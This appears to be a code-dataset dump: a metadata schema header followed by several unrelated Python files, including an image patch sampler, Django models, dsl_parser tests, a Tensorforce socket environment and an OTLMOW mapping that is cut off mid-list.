blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7fb792bad28f1c928186db0504bcf02a1cacecad | aa81fe0b271ffddfd9f3bac6ebf0d4c503fb1ad8 | /MultiPlanarUNet/sequences/isotrophic_live_view_sequence_3d.py | 97bb66d6d3081b0ef8919a52bcde07fff1c54eca | [
"MIT"
] | permissive | admshumar/MultiPlanarUNet | dd295d182e82ce903025ff2cb4895b2727c7b56a | 6b59e8f2e0fb9601c17dc32eec4bb114971bf0a1 | refs/heads/master | 2020-07-31T12:12:41.695269 | 2019-08-01T07:36:04 | 2019-08-01T07:36:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,050 | py | from MultiPlanarUNet.sequences.isotrophic_live_view_sequence import IsotrophicLiveViewSequence
from MultiPlanarUNet.interpolation.sample_grid import sample_box, sample_box_at
from MultiPlanarUNet.interpolation.linalg import mgrid_to_points
import numpy as np
class IsotrophicLiveViewSequence3D(IsotrophicLiveViewSequence):
def __init__(self, image_pair_loader, real_box_dim, bg_class, scaler,
no_log=False, **kwargs):
super().__init__(image_pair_loader, **kwargs)
self.bg_class = bg_class
self.scaler = scaler
self.real_box_dim = real_box_dim
self.batch_shape = (self.batch_size, self.sample_dim, self.sample_dim,
self.sample_dim, self.n_classes)
if not no_log:
self.log()
def log(self):
self.logger("Using sample dim: %s" % self.sample_dim)
self.logger("Using box real dim: %s" % self.real_box_dim)
self.logger("Using real space sample res: %s" % (self.real_box_dim/
self.sample_dim))
self.logger("N fg slices: %s" % self.n_fg_slices)
self.logger("Batch size: %s" % self.batch_size)
self.logger("Force all FG: %s" % self.force_all_fg)
def __len__(self):
""" Controlled in train.py """
return 10000
@staticmethod
def _intrp_and_norm(image, grid, intrp_lab):
# Interpolate
im = image.interpolator.intrp_image(grid)
# Normalize
im = image.scaler.transform(im)
lab = None
if intrp_lab:
lab = image.interpolator.intrp_labels(grid)
return im, lab
def get_base_patches_from(self, image, return_y=False, batch_size=1):
real_dims = image.real_shape
# Calculate positions
sample_space = np.asarray([max(i, self.real_box_dim) for i in real_dims])
d = (sample_space - self.real_box_dim)
min_cov = [np.ceil(sample_space[i]/self.real_box_dim).astype(np.int) for i in range(3)]
ds = [np.linspace(0, d[i], min_cov[i]) - sample_space[i]/2 for i in range(3)]
# Get placement coordinate points
placements = mgrid_to_points(np.meshgrid(*tuple(ds)))
for p in placements:
grid, axes, inv_mat = sample_box_at(real_placement=p,
sample_dim=self.sample_dim,
real_box_dim=self.real_box_dim,
noise_sd=0.0,
test_mode=True)
im, lab = self._intrp_and_norm(image, grid, return_y)
if return_y:
yield im, lab, grid, axes, inv_mat, len(placements)
else:
yield im, grid, axes, inv_mat, len(placements)
def get_N_random_patches_from(self, image, N, return_y=False):
if N > 0:
# Sample N patches from X
for i in range(N):
# Get grid and interpolate
grid, axes, inv_mat = sample_box(sample_dim=self.sample_dim,
real_box_dim=self.real_box_dim,
real_dims=image.real_shape,
noise_sd=self.noise_sd,
test_mode=True)
im, lab = self._intrp_and_norm(image, grid, return_y)
if return_y:
yield im, lab, grid, axes, inv_mat
else:
yield im, grid, axes, inv_mat
else:
return []
def __getitem__(self, idx):
"""
Used by keras.fit_generator to fetch mini-batches during training
"""
# If multiprocessing, set unique seed for this particular process
self.seed()
# Store how many slices has fg so far
has_fg = 0
has_fg_vec = np.zeros_like(self.fg_classes)
# Interpolate on a random index for each sample image to generate batch
batch_x, batch_y, batch_w = [], [], []
# Get a random image
max_tries = self.batch_size * 15
# Number of images to use in each batch. Number should be low enough
# to not exhaust queue generator.
N = 2 if self.image_pair_loader.queue else self.batch_size
cuts = np.round(np.linspace(0, self.batch_size, N+1)[1:])
scalers = []
bg_values = []
for i, image in enumerate(self.image_pair_loader.get_random(N=N)):
tries = 0
# Sample a batch from the image
while len(batch_x) < cuts[i]:
# Get grid and interpolate
mgrid = sample_box(sample_dim=self.sample_dim,
real_box_dim=self.real_box_dim,
real_dims=image.real_shape,
noise_sd=self.noise_sd)
# Get interpolated labels
lab = image.interpolator.intrp_labels(mgrid)
valid_lab, fg_change = self.validate_lab(lab, has_fg, len(batch_y))
if self.force_all_fg and tries < max_tries:
valid, has_fg_vec = self.validate_lab_vec(lab,
has_fg_vec,
len(batch_y))
if not valid:
tries += 1
continue
if valid_lab or tries > max_tries:
# Get interpolated image
im = image.interpolator.intrp_image(mgrid)
if tries > max_tries or self.is_valid_im(im, image.bg_value):
# Update foreground counter
has_fg += fg_change
# Save scaler to normalize image later (after potential
# augmentation)
scalers.append(image.scaler)
# Save bg value if needed in potential augmenters
bg_values.append(image.bg_value)
# Add to batches
batch_x.append(im)
batch_y.append(lab)
batch_w.append(image.sample_weight)
# Apply augmentation if specified
batch_x, batch_y, batch_w = self.augment(batch_x, batch_y,
batch_w, bg_values)
# Normalize images
batch_x = self.scale(batch_x, scalers)
# Reshape, one-hot encode etc.
batch_x, batch_y, batch_w = self.prepare_batches(batch_x,
batch_y,
batch_w)
assert len(batch_x) == self.batch_size
return batch_x, batch_y, batch_w
| [
"[email protected]"
] | |
a5f77e33734ac4166f39a977b6fb45bb27e0877b | 0ce10b36e9e886c79dca46e2247603b17475206a | /cell2cell/external/__init__.py | e8bb83dc0a7e1ded1f6450b3e063913378edc7e8 | [
"BSD-3-Clause"
] | permissive | earmingol/cell2cell | dd5e5186a8793097db4e28bdf23c340399effd22 | 9fa855d48dc9c4b132fc59e2de1db23a37dc7c5e | refs/heads/master | 2023-05-31T02:12:51.127542 | 2023-04-20T19:39:54 | 2023-04-20T19:39:54 | 182,623,687 | 46 | 10 | BSD-3-Clause | 2023-04-20T19:39:55 | 2019-04-22T04:37:54 | Python | UTF-8 | Python | false | false | 257 | py | from cell2cell.external.pcoa import (pcoa, pcoa_biplot, _check_ordination)
from cell2cell.external.goenrich import (goa, ontology)
from cell2cell.external.gseapy import (load_gmt, generate_lr_geneset, run_gsea)
from cell2cell.external.umap import (run_umap) | [
"[email protected]"
] | |
a035d7288fa8d1cd1793230d7e381fb2968f4991 | ef158af9d47fb1f0c974b49405174ba5b34e4721 | /photoo/tendance_file/TENDANCE/remplir_database/analyse_femme_haut.py | 49225333ad4fb68df01886c4602d7801f497b806 | [] | no_license | LeGrosLezard/bobo | 1227bcae22d9eb7d9e0423009cae154df5466994 | 7c50de512fb22c8bdf1a1127307fc4fd2f371152 | refs/heads/master | 2020-07-01T17:38:14.145955 | 2019-07-01T21:29:49 | 2019-07-01T21:29:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,505 | py | import sys
import os
import cv2
from colour import *
import numpy as np
from PIL import Image, ImageDraw, ImageChops
from matplotlib import pyplot as plt
import math
from palettecouleur_coiffure import couleur_cheuvelure
from coul import *
from palettecouleur import DICO_COULEUR
from database import insertion_table
import psycopg2
import shutil
from config import HOST
from config import USER
from config import PASSWORD
from config import DATABASE
from config import LISTE2
def resize(img, save):
"""We resizing picture to 100x 100y"""
image = Image.open(img)
image = image.resize((100,100))
image.save(save)
def mask_bas(i):
"""We create the first mask for jean for example
we take the bottom of the picture"""
print('mask bas de :', i)
img = Image.open(i)
masque = Image.new('RGB', img.size, color=(255,255,255))
a = img.size[0] / 100 *30
b = img.size[1] / 100* 70
c = 0
d = img.size[1]
coords = (a,b, c,d)
masque_draw = ImageDraw.Draw(masque)
masque_draw.rectangle(coords, fill=(0,0,0))
diff = ImageChops.lighter(img, masque)
img = img.rotate(180)
img.crop((0, 0, b/2, a)).save('traitement_bas1.jpg')
print('fin')
def mask_haut(i):
"""We create the second mask for t-shirt for example
we take the top of the picture"""
img = Image.open(i)
print('mask haut de :', i)
masque = Image.new('RGB', img.size, color=(255,255,255))
a = img.size[1]
b = img.size[0] / 100 * 100
c = 0
d = 0
coords = (a,b, c,d)
masque_draw = ImageDraw.Draw(masque)
masque_draw.rectangle(coords, fill=(0,0,0))
diff = ImageChops.lighter(img, masque)
img.crop((0, 0, b, a/2)).save('traitement_haut.jpg')
def couleur_habit(im):
"""We recuperate all color from
the picture"""
print(im, ' : en cours')
image = cv2.imread(im)
print('ok')
largeur = image.shape[1]
hauteur = image.shape[0]
taille = largeur * hauteur
print('ok1')
couleur_liste = []
for x in range(image.shape[0]):
for y in range(image.shape[1]):
colordb = get_colordb('bobo.txt')
if not colordb:
print('No parseable color database found')
sys.exit(1)
nearest = colordb.nearest(image[x,y][2],
image[x,y][1],
image[x,y][0])
couleur_liste.append(nearest)
print('ok2')
return taille, couleur_liste
def function_couleur_cheveux(image):
"""Here we recuperate the
most value into the picture"""
dico = {}
im = Image.open(image)
for value in im.getdata():
if value in dico.keys():
dico[value] += 1
else:
dico[value] = 1
liste = []
for cle, valeur in dico.items():
liste.append((cle, valeur))
return liste
def function_couleur_cheveux1(liste):
"""We destroy all white (background)"""
liste2 = []
for i in liste:
if i[0][0] >= 240 and\
i[0][1] >= 240 and\
i[0][2] >= 240:
pass
else:
liste2.append(i)
return liste2
def function_couleur_cheveux2(liste2):
"""Here we scoring the last most value from
the picture"""
dico_couleur = {'marron':0, 'noir':0, 'blond':0}
for i in liste2:
coul = couleur_cheuvelure(i[0][0], i[0][1], i[0][2])
if coul == None:
pass
else:
if coul == 'blond':
dico_couleur['blond'] += 1
elif coul == 'marron':
dico_couleur['marron'] += 1
elif coul == 'noir':
dico_couleur['noir'] += 1
return dico_couleur
def couleur_cheveux(image):
"""We analysis data from
haircuts picture for
determinate the color"""
liste = function_couleur_cheveux(image)
liste2 = function_couleur_cheveux1(liste)
dico_couleur = function_couleur_cheveux2(liste2)
if dico_couleur['blond'] > dico_couleur['marron'] + 1000 and\
dico_couleur['blond'] > dico_couleur['noir']:
print('couleur de cheveux blond')
return 'blond'
elif dico_couleur['marron'] > dico_couleur['blond'] + 1000 and\
dico_couleur['marron'] > dico_couleur['noir']:
print('couleur de cheveux marron')
return 'marron'
elif dico_couleur['noir'] > dico_couleur['blond'] and\
dico_couleur['noir'] > dico_couleur['noir']:
print('couleur de cheveux noir')
return 'noir'
elif dico_couleur['marron'] >= dico_couleur['blond'] + 400 and\
dico_couleur['marron'] > dico_couleur['noir']:
print('couleur de cheveux chatin')
return 'chatin'
elif dico_couleur['blond'] >= dico_couleur['marron'] + 400 and\
dico_couleur['blond'] > dico_couleur['noir']:
print('couleur de cheveux chatin')
return 'chatin'
def insertion_info(nom, sexe, haut, bas, taille_haut, taille_bas):
"""We insert data into the database"""
conn = psycopg2.connect(database=DATABASE,
user=USER,
host=HOST,
password=PASSWORD)
cur = conn.cursor()
cur.execute("""insert into bobo1
(image, sexe, haut, bas, taille_haut, taille_bas)
values(%s, %s, %s, %s, %s, %s);""",
(nom, sexe, haut, bas, taille_haut,
taille_bas))
conn.commit()
def ccoiffure(image, coiffure):
"""We insert haircuts in the database"""
conn = psycopg2.connect(database=DATABASE,
user=USER,
host=HOST,
password=PASSWORD)
cur = conn.cursor()
cur.execute("""insert into bobo1_coiffure
(image, coiffure)
values(%s, %s);""", (image, coiffure))
conn.commit()
def pré_visualisation_donnée(table):
conn = psycopg2.connect(database=DATABASE,
user=USER,
host=HOST,
password=PASSWORD)
cur = conn.cursor()
cur.execute("""SELECT * from {}""".format(table))
rows = cur.fetchall()
liste = [i for i in rows]
return liste
def function_traitement():
"""Here we call database
for see if we have news pictures."""
os.chdir('/app/static/bobo')
liste = os.listdir()
element = pré_visualisation_donnée('bobo1')
element2 = pré_visualisation_donnée('bobo1_coiffure')
for i in element:
LISTE2.append(i[1])
for i in element2:
LISTE2.append(i[1])
set1 = set(LISTE2)
set2 = set(liste)
liste3 = []
for a in set1 :
if not(a in set2):
print(a)
for b in set2 :
if not(b in set1):
liste3.append(b)
return liste3
def traitement():
"""Here we insert picture of body and
haircuts into database with them colors"""
liste3 = function_traitement()
print(sorted(liste3),'000000000LISTE3')
for i in sorted(liste3):
print(i)
nom = i[-5:-4]
if nom == 'a':
mask_bas(i)
resize('traitement_bas1.jpg', 'traitement_bas1.jpg')
bas = couleur_habit('traitement_bas1.jpg')
mask_haut(i)
resize('traitement_haut.jpg', 'traitement_haut.jpg')
haut = couleur_habit('traitement_haut.jpg')
insertion_info(i, 'féminin', haut[1], bas[1],
haut[0], bas[0])
elif nom == 'b':
coiffure = couleur_cheveux(i)
print(coiffure)
ccoiffure(i, coiffure)
| [
"[email protected]"
] | |
79b59580a3c12ad1a907baf87ad0c83e41650f0c | 73744790709a75fa15bd3a9c141777b81acf6402 | /dsl_parser/tests/test_get_consumers.py | e7612b10eeaeb7bd0d54a87f5825c0e58de59c58 | [
"Apache-2.0"
] | permissive | cloudify-cosmo/cloudify-common | aea8f9b9b1f5d85a23b6f8d3f61b8a445d2fc27e | 246550c150e33e3e8cf815e1ecff244d82293832 | refs/heads/master | 2023-08-24T12:44:40.277500 | 2023-08-17T08:54:31 | 2023-08-17T08:54:31 | 132,621,915 | 8 | 16 | Apache-2.0 | 2023-08-24T12:27:03 | 2018-05-08T14:35:12 | Python | UTF-8 | Python | false | false | 3,239 | py | from dsl_parser import functions
from dsl_parser.tasks import prepare_deployment_plan
from dsl_parser.tests.abstract_test_parser import AbstractTestParser
class TestGetConsumers(AbstractTestParser):
def setUp(self):
super(TestGetConsumers, self).setUp()
self.mock_storage = self.mock_evaluation_storage(
consumers={
'app1': 'App1',
'app2': 'My Second App',
'app3': 'App #3'
})
def test_node_template_properties_simple(self):
yaml = """
node_types:
type:
properties:
property: {}
node_templates:
node:
type: type
properties:
property: { get_consumers: ids }
"""
parsed = prepare_deployment_plan(self.parse_1_3(yaml))
node = self.get_node_by_name(parsed, 'node')
self.assertEqual({'get_consumers': 'ids'},
node['properties']['property'])
functions.evaluate_functions(parsed, {}, self.mock_storage)
self.assertEqual(set(node['properties']['property']),
{'app1', 'app2', 'app3'})
def test_consumers_in_outputs(self):
yaml = """
node_types:
type: {}
node_templates:
node:
type: type
outputs:
consumers:
value: { get_consumers: ids }
consumer_count:
value: { get_consumers: count }
"""
parsed = prepare_deployment_plan(self.parse_1_3(yaml))
outputs = parsed.outputs
self.assertEqual({'get_consumers': 'ids'},
outputs['consumers']['value'])
functions.evaluate_functions(parsed, {}, self.mock_storage)
self.assertEqual(set(outputs['consumers']['value']),
{'app1', 'app2', 'app3'})
self.assertEqual(outputs['consumer_count']['value'], 3)
def test_consumers_in_inputs(self):
yaml = """
inputs:
consumer_count:
default: { get_consumers: count }
consumer_names:
default: { get_consumers: names }
node_types:
type: {}
node_templates:
node:
type: type
outputs:
consumers:
value: { get_input: consumer_names }
consumer_count:
value: { get_input: consumer_count }
"""
parsed = prepare_deployment_plan(self.parse_1_3(yaml))
outputs = parsed.outputs
# `get_input` is evaluated at parse time, so we expect to see it
# replaced here with the `get_consumers_count` function
self.assertEqual({'get_consumers': 'count'},
outputs['consumer_count']['value'])
functions.evaluate_functions(parsed, {}, self.mock_storage)
self.assertEqual(outputs['consumer_count']['value'], 3)
self.assertEqual(set(outputs['consumers']['value']),
{'App1', 'My Second App', 'App #3'})
def test_illegal_arguments(self):
yaml = """
node_types:
type:
properties:
property: {}
node_templates:
node:
type: type
properties:
property: { get_consumers: [a, b] }
"""
self.assertRaisesRegex(
ValueError,
"Illegal argument passed to get_consumers",
self.parse_1_3,
yaml)
| [
"[email protected]"
] | |
26d99bcd4bb2a02032289382381ac6d94fc386f1 | 9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97 | /sdBs/AllRun/sdssj_092520.01+273619.7/sdB_SDSSJ_092520.01+273619.7_coadd.py | 3c92de12f087f3a8d072508af616ae85d6589595 | [] | no_license | tboudreaux/SummerSTScICode | 73b2e5839b10c0bf733808f4316d34be91c5a3bd | 4dd1ffbb09e0a599257d21872f9d62b5420028b0 | refs/heads/master | 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 482 | py | from gPhoton.gMap import gMap
def main():
gMap(band="NUV", skypos=[141.333375,27.605472], skyrange=[0.0333333333333,0.0333333333333], stepsz = 30., cntfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdBs/sdB_SDSSJ_092520.01+273619.7/sdB_SDSSJ_092520.01+273619.7_movie_count.fits", cntcoaddfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdB/sdB_SDSSJ_092520.01+273619.7/sdB_SDSSJ_092520.01+273619.7_count_coadd.fits", overwrite=True, verbose=3)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
0f95cdce65712bdf588c43e499e4f3c3114fd710 | e8a8d8099419306feb8849625f65357456b6a2ae | /proj/app/models.py | 4beb0e5041f2baa1d0e3b62ee95cc1796dee1cb1 | [] | no_license | Sentret/classificator | 57224597f64f44462be61228e6ed7e18b6973181 | 86aafc5884215918f1cdac92f17360ac671dc703 | refs/heads/master | 2021-08-30T09:52:48.157374 | 2017-12-17T10:17:39 | 2017-12-17T10:17:39 | 114,526,924 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,203 | py | from django.db import models
class Topic(models.Model):
name = models.CharField(max_length=100)
classifier = models.ForeignKey('Classifier', blank=True, null=True)
class Meta:
unique_together = ('name', 'classifier',)
def __str__(self):
return self.name
class Classifier(models.Model):
name = models.CharField(max_length=100)
discription = models.TextField(max_length=1000, null=True)
version = models.ForeignKey('ClassifierVersion', blank=True, null=True)
status = models.CharField(max_length=8, default='Не обучен')
path_to_bin = models.CharField(max_length=100, null=True)
def save(self, *args, **kwargs):
self.path_to_bin = str(self.name) + '_pickle'
return super(Classifier, self).save(*args, **kwargs)
def __str__(self):
return self.name
class ClassifierVersion(models.Model):
topics = models.ManyToManyField('Topic')
version = models.IntegerField()
#путь до файла, с сериализованным объектом
path_to_bin = models.CharField(max_length=25)
def __str__(self):
return self.classifier.name + ' ' + str(version)
| [
"[email protected]"
] | |
34d9562b56d5ed5af1c74797c367485b191fa909 | 2844812adf8e919c6629463e33a1d9a3634ec0cc | /tests/benchmarks/base_utils.py | 648eb5f0e2caa2f0b29dac0e485f6bc089b50e29 | [
"Apache-2.0"
] | permissive | tods-doc/d3m | 0d920a4a88172c925cce7cd75c37296c3522a0c5 | e25793d4aaa9a8fdb63ac33bf1c045b96d6067a6 | refs/heads/master | 2023-02-08T22:07:43.279961 | 2021-01-05T21:27:15 | 2021-01-05T21:27:15 | 296,895,826 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,618 | py | from d3m import container
from d3m.base import utils as base_utils
class CombineColumns:
params = [[100, 300, 500, 700, 900]]
param_names = ['columns']
def setup(self, columns):
self.large_dataframe_with_many_columns = container.DataFrame({str(i): [j for j in range(5)] for i in range(columns)}, columns=[str(i) for i in range(columns)], generate_metadata=True)
self.list_of_many_dataframe_columns = [
container.DataFrame({str(i): [j for j in range(5, 10)]}, columns=[str(i)], generate_metadata=True)
for i in range(int(columns / 2))
]
def time_append(self, columns):
base_utils.combine_columns(
self.large_dataframe_with_many_columns,
list(range(int(columns / 4), int(columns / 2))), # Just 1/4 of columns.
self.list_of_many_dataframe_columns,
return_result='append',
add_index_columns=True,
)
def time_replace(self, columns):
base_utils.combine_columns(
self.large_dataframe_with_many_columns,
list(range(int(columns / 4), int(columns / 2))), # Just 1/4 of columns.
self.list_of_many_dataframe_columns,
return_result='replace',
add_index_columns=True,
)
def time_new(self, columns):
base_utils.combine_columns(
self.large_dataframe_with_many_columns,
list(range(int(columns / 4), int(columns / 2))), # Just 1/4 of columns.
self.list_of_many_dataframe_columns,
return_result='new',
add_index_columns=True,
)
| [
"[email protected]"
] | |
9fd4dc4e6e75819bbed57836d6ef6fe3242ab4b4 | bd71b063f13958e07c9e16cd171d3fc0e1c58e4d | /0x0A-python-inheritance/100-my_int.py | f8cf0a3390d1775fbb032aa8af847e38377d73ed | [] | no_license | feliciahsieh/holbertonschool-higher_level_programming | 2aecd291f85fe69ab11331bb2d5372c6d67e1af6 | 017e8b87f9d8967b55ccc68ed30921572d4ddb65 | refs/heads/master | 2021-01-01T20:46:36.901665 | 2019-04-10T18:24:59 | 2019-04-10T18:24:59 | 98,931,138 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 541 | py | #!/usr/bin/python3
class MyInt(int):
"""
MyInt - class that inherits from int
"""
def __eq__(self, other):
"""
__eq__ - redefine == to !=
Args:
other - other operand
Return:
True if Not_Equal to
"""
return int(self) != int(other)
def __ne__(self, other):
"""
__ne__ - redefine != to ==
Args:
other - other operand
Return:
True if Equal to
"""
return int(self) == int(other)
| [
"[email protected]"
] | |
64a65dc8e8eb1d2a4fda1b44992a6c4e8928a5f0 | 15ed27bece0ae11ee0ae19f7d8fbffb1bd6db342 | /tensorforce/environments/socket_environment.py | 20cfde293eb197ba167a9b4a457e7ab276897cdb | [
"Apache-2.0"
] | permissive | marload/tensorforce | 06baea28096d04bbe1f42ee99d0d8e4d815d1e40 | 7101282b2c4a0524361aeeab22d3a2c5a3dd03bc | refs/heads/master | 2021-04-01T09:55:48.154186 | 2020-03-17T23:38:49 | 2020-03-17T23:38:49 | 248,179,865 | 1 | 0 | Apache-2.0 | 2020-03-18T08:46:32 | 2020-03-18T08:46:31 | null | UTF-8 | Python | false | false | 5,808 | py | # Copyright 2020 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from socket import SHUT_RDWR, socket as Socket
import msgpack
import msgpack_numpy
from tensorforce import TensorforceError, util
from tensorforce.environments import RemoteEnvironment
msgpack_numpy.patch()
class SocketEnvironment(RemoteEnvironment):
"""
An earlier version of this code (#626) was originally developed as part of the following work:
Rabault, J., Kuhnle, A (2019). Accelerating Deep Reinforcement Leaning strategies of Flow
Control through a multi-environment approach. Physics of Fluids.
"""
MAX_BYTES = 4096
@classmethod
def remote(cls, port, environment, max_episode_timesteps=None, **kwargs):
socket = Socket()
socket.bind(('', port))
socket.listen(1)
connection, address = socket.accept()
socket.close()
super().remote(
connection=connection, environment=environment,
max_episode_timesteps=max_episode_timesteps, **kwargs
)
@classmethod
def proxy_send(cls, connection, function, **kwargs):
str_function = function.encode()
num_bytes = len(str_function)
str_num_bytes = '{:08d}'.format(num_bytes).encode()
bytes_sent = connection.send(str_num_bytes + str_function)
if bytes_sent != num_bytes + 8:
raise TensorforceError.unexpected()
str_kwargs = msgpack.packb(o=kwargs)
num_bytes = len(str_kwargs)
str_num_bytes = '{:08d}'.format(num_bytes).encode()
bytes_sent = connection.send(str_num_bytes + str_kwargs)
if bytes_sent != num_bytes + 8:
raise TensorforceError.unexpected()
@classmethod
def proxy_receive(cls, connection):
str_success = connection.recv(1)
if len(str_success) != 1:
raise TensorforceError.unexpected()
success = bool(str_success)
str_num_bytes = connection.recv(8)
if len(str_num_bytes) != 8:
raise TensorforceError.unexpected()
num_bytes = int(str_num_bytes.decode())
str_result = b''
for n in range(num_bytes // cls.MAX_BYTES):
str_result += connection.recv(cls.MAX_BYTES)
if len(str_result) != n * cls.MAX_BYTES:
raise TensorforceError.unexpected()
str_result += connection.recv(num_bytes % cls.MAX_BYTES)
if len(str_result) != num_bytes:
raise TensorforceError.unexpected()
result = msgpack.unpackb(packed=str_result)
decode = (lambda x: x.decode() if isinstance(x, bytes) else x)
result = util.fmap(function=decode, xs=result, map_keys=True)
return success, result
@classmethod
def proxy_close(cls, connection):
connection.shutdown(SHUT_RDWR)
connection.close()
@classmethod
def remote_send(cls, connection, success, result):
str_success = str(int(success)).encode()
bytes_sent = connection.send(str_success)
if bytes_sent != 1:
raise TensorforceError.unexpected()
str_result = msgpack.packb(o=result)
num_bytes = len(str_result)
str_num_bytes = '{:08d}'.format(num_bytes).encode()
bytes_sent = connection.send(str_num_bytes + str_result)
assert bytes_sent == num_bytes + 8
if bytes_sent != num_bytes + 8:
raise TensorforceError.unexpected()
@classmethod
def remote_receive(cls, connection):
str_num_bytes = connection.recv(8)
if len(str_num_bytes) != 8:
raise TensorforceError.unexpected()
num_bytes = int(str_num_bytes.decode())
str_function = b''
for n in range(num_bytes // cls.MAX_BYTES):
str_function += connection.recv(cls.MAX_BYTES)
if len(str_function) != n * cls.MAX_BYTES:
raise TensorforceError.unexpected()
str_function += connection.recv(num_bytes % cls.MAX_BYTES)
if len(str_function) != num_bytes:
raise TensorforceError.unexpected()
function = str_function.decode()
str_num_bytes = connection.recv(8)
if len(str_num_bytes) != 8:
raise TensorforceError.unexpected()
num_bytes = int(str_num_bytes.decode())
str_kwargs = b''
for n in range(num_bytes // cls.MAX_BYTES):
str_kwargs += connection.recv(cls.MAX_BYTES)
if len(str_kwargs) != n * cls.MAX_BYTES:
raise TensorforceError.unexpected()
str_kwargs += connection.recv(num_bytes % cls.MAX_BYTES)
if len(str_kwargs) != num_bytes:
raise TensorforceError.unexpected()
kwargs = msgpack.unpackb(packed=str_kwargs)
decode = (lambda x: x.decode() if isinstance(x, bytes) else x)
kwargs = util.fmap(function=decode, xs=kwargs, map_keys=True)
return function, kwargs
@classmethod
def remote_close(cls, connection):
connection.shutdown(SHUT_RDWR)
connection.close()
def __init__(self, host, port, blocking=False):
socket = Socket()
socket.connect((host, port))
super().__init__(connection=socket, blocking=blocking)
| [
"[email protected]"
] | |
42635fa6693ccd0a767871eb5e8353b606f9eb6d | 0e478f3d8b6c323c093455428c9094c45de13bac | /src/OTLMOW/PostenMapping/Model/Post060261215.py | 1e8401f5696f51dc2d278fa4a273f956133d8b95 | [
"MIT"
] | permissive | davidvlaminck/OTLMOW | c6eae90b2cab8a741271002cde454427ca8b75ba | 48f8c357c475da1d2a1bc7820556843d4b37838d | refs/heads/main | 2023-01-12T05:08:40.442734 | 2023-01-10T15:26:39 | 2023-01-10T15:26:39 | 432,681,113 | 3 | 1 | MIT | 2022-06-20T20:36:00 | 2021-11-28T10:28:24 | Python | UTF-8 | Python | false | false | 4,912 | py | # coding=utf-8
from OTLMOW.PostenMapping.StandaardPost import StandaardPost
from OTLMOW.PostenMapping.StandaardPostMapping import StandaardPostMapping
# Generated with PostenCreator. To modify: extend, do not edit
class Post060261215(StandaardPost):
def __init__(self):
super().__init__(
nummer='0602.61215',
beschrijving='Toplaag, bouwklassegroep B1-B3 volgens 6-2, type SMA-C2 met polymeerbitumen, dikte E = 5 cm',
meetstaateenheid='M2',
mappings=[StandaardPostMapping(
typeURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#BitumineuzeLaag',
attribuutURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#DtuBVLaagtypes.laagtype',
dotnotation='laagtype.laagtype',
defaultWaarde='andere-toplagen',
range='',
usagenote='',
isMeetstaatAttr=0,
isAltijdInTeVullen=0,
isBasisMapping=1,
mappingStatus='gemapt 2.0',
mappingOpmerking='',
standaardpostnummer='0602.61215')
, StandaardPostMapping(
typeURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#BitumineuzeLaag',
attribuutURI='https://wegenenverkeer.data.vlaanderen.be/ns/abstracten#Laag.laagRol',
dotnotation='laagRol',
defaultWaarde='verharding',
range='',
usagenote='',
isMeetstaatAttr=0,
isAltijdInTeVullen=0,
isBasisMapping=1,
mappingStatus='gemapt 2.0',
mappingOpmerking='',
standaardpostnummer='0602.61215')
, StandaardPostMapping(
typeURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#BitumineuzeLaag',
attribuutURI='https://wegenenverkeer.data.vlaanderen.be/ns/abstracten#LaagBouwklasse.bouwklasse',
dotnotation='bouwklasse',
defaultWaarde='',
range='B1|B2|B3',
usagenote='',
isMeetstaatAttr=0,
isAltijdInTeVullen=1,
isBasisMapping=1,
mappingStatus='gemapt 2.0',
mappingOpmerking='',
standaardpostnummer='0602.61215')
, StandaardPostMapping(
typeURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#BitumineuzeLaag',
attribuutURI='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#BitumineuzeLaag.mengseltype',
dotnotation='mengseltype',
defaultWaarde='SMA-C2',
range='',
usagenote='',
isMeetstaatAttr=0,
isAltijdInTeVullen=0,
isBasisMapping=1,
mappingStatus='gemapt 2.0',
mappingOpmerking='',
standaardpostnummer='0602.61215')
, StandaardPostMapping(
